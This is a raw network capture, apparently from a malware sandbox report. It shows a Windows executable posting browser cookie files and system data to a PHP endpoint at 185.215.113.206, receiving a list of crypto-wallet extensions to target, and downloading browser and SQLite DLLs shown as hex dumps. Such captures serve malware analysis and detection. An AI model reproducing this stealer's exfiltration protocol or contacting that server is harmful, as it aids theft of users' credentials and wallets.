35 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 43 47 43 46 48 49 45 48 49 44 47 44 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 43 47 43 46 48 49 45 48 49 44 47 44 42 41 41 45 2d 2d 0d 0a Data Ascii: ------EGDGCGCFHIEHIDGDBAAEContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------EGDGCGCFHIEHIDGDBAAEContent-Disposition: form-data; name="message"fplugins------EGDGCGCFHIEHIDGDBAAE--
Nov 13, 2024 20:39:20.793884039 CET	335	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:20 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Nov 13, 2024 20:39:20.811896086 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBF Host: 185.215.113.206 Content-Length: 7763 Connection: Keep-Alive Cache-Control: no-cache
Nov 13, 2024 20:39:20.811938047 CET	7763	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 Data Ascii: ------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Nov 13, 2024 20:39:21.617615938 CET	202	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 13, 2024 20:39:21.924839020 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 13, 2024 20:39:22.211704969 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:22 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Nov 13, 2024 20:39:22.211796045 CET	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Nov 13, 2024 20:39:22.211832047 CET	424	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49804	185.215.113.206	80	2232	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:39:33.431555986 CET	629	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFBAECBAEGDGDHIEHIJ Host: 185.215.113.206 Content-Length: 427 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------BKFBAECBAEGDGDHIEHIJContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------BKFBAECBAEGDGDHIEHIJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------BKFBAECBAEGDGDHIEHIJContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------BKFBAECBAEGDGDHIEHIJ--
Nov 13, 2024 20:39:34.851644993 CET	203	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 13, 2024 20:39:34.999298096 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJ Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="file"------CGHCFBAAAFHJDGCBFIIJ--
Nov 13, 2024 20:39:35.782927036 CET	202	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49873	185.215.113.206	80	2232	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:39:41.646929026 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCB Host: 185.215.113.206 Content-Length: 3087 Connection: Keep-Alive Cache-Control: no-cache
Nov 13, 2024 20:39:41.646972895 CET	3087	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 Data Ascii: ------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="file_name"Y29va2llc1xNa
Nov 13, 2024 20:39:43.058425903 CET	203	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 13, 2024 20:39:43.162581921 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBKECAKFBGCAKECGIEH Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GCBKECAKFBGCAKECGIEHContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------GCBKECAKFBGCAKECGIEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCBKECAKFBGCAKECGIEHContent-Disposition: form-data; name="file"------GCBKECAKFBGCAKECGIEH--
Nov 13, 2024 20:39:43.934598923 CET	202	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 13, 2024 20:39:45.219078064 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 13, 2024 20:39:45.498730898 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:45 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Nov 13, 2024 20:39:45.498742104 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
Nov 13, 2024 20:39:45.498758078 CET	424	IN	Data Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh\|$,}uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$
Nov 13, 2024 20:39:45.498775959 CET	1236	IN	Data Raw: 0f b6 fb 31 54 24 44 81 e1 00 ff 00 00 09 c1 09 cf 89 7c 24 40 80 7c 24 07 00 74 10 8b 5c 24 28 e9 a7 00 00 00 0f 1f 80 00 00 00 00 8b 44 24 08 80 ec 01 8b 5c 24 28 73 46 8b 44 24 0c 2c 01 89 44 24 0c 73 40 8b 44 24 10 2c 01 89 44 24 10 73 3c 8b Data Ascii: 1T$D\|$@\|$t\$(D$\$(sFD$,D$s@D$,D$s<D$,sBD$,s@D$ ,D$ D$$D$$D$(D$GD$?D$D$1D$L$D$D$D$D$f.DD$HjD$DPjL$HQPt$@m
Nov 13, 2024 20:39:45.498790026 CET	1236	IN	Data Raw: 07 00 00 00 29 c8 c1 f8 1f f7 d0 8b 4d 1c 80 7c 31 f0 01 19 c9 09 c1 85 ca 74 2f 8b 45 10 8b 55 d0 89 10 b9 03 e0 ff ff 3b 55 14 8b 5d d4 77 22 31 ff 8b 45 0c 39 c6 74 3a 52 56 50 e8 20 01 08 00 eb 2d bf ff ff ff ff eb 3a b9 02 e0 ff ff 8b 5d d4 Data Ascii: )M\|1t/EU;U]w"1E9t:RVP -:]QsE9uSjPEtSP\M1$^_[]USWVut:}t$FHjShjVPt^_[]^_[]USWV}
Nov 13, 2024 20:39:45.498800993 CET	424	IN	Data Raw: 0a 10 6a 01 57 ff d1 83 c4 08 68 0c 01 00 00 6a 00 56 e8 34 fc 07 00 83 c4 0c eb 25 85 ff 74 15 89 c8 89 f1 89 d6 8b 55 10 56 50 e8 64 fc ff ff 83 c4 10 eb 6e 8d 46 08 89 45 ec 8b 46 08 89 45 f0 c7 46 08 00 00 00 00 89 5e 04 8b 4b 04 ff 15 00 80 Data Ascii: jWhjV4%tUVPdnFEFEF^Kt=Uuu#t>t FHjWEM1^_[]USWVu>FHW>FHXSVW^_[]
Nov 13, 2024 20:39:45.498814106 CET	948	IN	Data Raw: ff d1 83 c4 0c 8b 37 8b 47 04 8b 48 14 8b 45 10 8b 18 ff 15 00 80 0a 10 53 8b 5d 0c 53 56 ff d1 83 c4 0c 8b 37 8b 47 04 8b 48 18 ff 15 00 80 0a 10 ff 75 14 ff 75 10 53 56 ff d1 83 c4 10 31 c0 83 c4 04 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 Data Ascii: 7GHES]SV7GHuuSV1^_[]USWVPh1tq]@CFECHut7FKSrQP;KqSPVi^_[]Uh
Nov 13, 2024 20:39:45.498825073 CET	1236	IN	Data Raw: 3e 83 c0 02 eb b2 66 c7 86 00 01 00 00 00 00 89 f7 8b 4d f0 31 e9 e8 dd f4 07 00 89 f8 81 c4 08 01 00 00 5e 5f 5b 5d c3 55 89 e5 83 7d 0c 00 74 10 68 02 01 00 00 ff 75 08 e8 6f f6 07 00 83 c4 08 5d c3 cc cc cc cc cc 55 89 e5 56 8b 75 1c 8b 45 14 Data Ascii: >fM1^_[]U}thuo]UVuE9sh;UMVuPu^]USWV4MEE9EshyU}]E}}aM}
Nov 13, 2024 20:39:45.498836040 CET	1236	IN	Data Raw: f4 e9 66 0f 70 f5 e8 66 0f 70 c9 f5 66 0f f4 cc 66 0f 70 c9 e8 66 0f 62 f1 66 0f eb f2 66 0f 6f d0 66 0f fe 15 f0 20 08 10 83 c8 08 66 0f 6e 0c 07 66 0f 60 cb 66 0f 61 cb 66 0f 72 f2 17 66 0f 6f 2d e0 20 08 10 66 0f fe d5 f3 0f 5b d2 66 0f 70 e1 Data Ascii: fpfpffpfbffof fnf`fafrfo- f[fpffpffof%!fpfpfbfnTf`faffrf[fpffpffpfpfbff!~sMEMEUxE
Nov 13, 2024 20:39:45.498847008 CET	1236	IN	Data Raw: 8b 45 e8 8b 4d ec 8d 4c 01 02 0f b6 c9 8b 45 f0 0f b6 14 08 00 d3 0f b6 f3 8b 45 f0 0f b6 04 30 8b 7d f0 88 04 0f 8b 4d f0 88 14 31 00 d0 0f b6 c0 8b 4d f0 0f b6 0c 01 c1 e1 08 03 4d cc 8b 45 e8 8b 55 ec 01 d0 83 c0 03 0f b6 c0 8b 55 f0 0f b6 14 Data Ascii: EMLEE0}M1MMEUU}47}4E0UMUU}47}4M1uU3UMEM}}Eu;uUM
Nov 13, 2024 20:39:48.562604904 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 13, 2024 20:39:48.844172001 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:48 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Nov 13, 2024 20:39:50.617935896 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 13, 2024 20:39:50.897505045 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:50 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Nov 13, 2024 20:39:51.672745943 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 13, 2024 20:39:51.952503920 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:51 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 